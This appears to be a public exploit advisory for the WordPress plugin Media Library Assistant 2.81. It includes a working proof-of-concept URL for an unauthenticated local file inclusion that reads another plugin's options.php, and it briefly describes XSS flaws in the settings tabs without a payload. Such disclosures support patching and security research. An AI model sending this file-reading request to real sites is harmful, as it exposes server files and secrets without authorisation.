1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 |
# Exploit Title: WordPress Plugin Media Library Assistant 2.81 - Local File Inclusion # Google Dork: N/A # Date: 2020-04-13 # Exploit Author: Daniel Monzón (stark0de) # Vendor Homepage: http://davidlingren.com/ # Software Link: https://wordpress.org/plugins/media-library-assistant/ # Version: 2.81 # Tested on: Windows 7 x86 SP1 # CVE : CVE-2020-11731, CVE-2020-11732 ----Local File Inclusion---------------------------- There is a file inclusion vulnerability in the mla-file-downloader.php file. Example: http://server/wordpress/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=C:\Bitnami\wordpress-5.3.2-2\apps\wordpress\htdocs\wp-content\plugins\updraftplus\options.php Visiting the above URL would lead to disclosure of the contents of options.php. Note that this vulnerability does not require authentication. ----Multiple Cross-Site-Scripting------------------- There are both reflected and stored cross-site scripting vulnerabilities in almost all Settings/Media Library Assistant tabs, which allow remote authenticated users to execute arbitrary JavaScript. Note that this vulnerability requires authentication. Tested on Windows 7 Pro SP1 32-bit and WordPress 5.3.2 |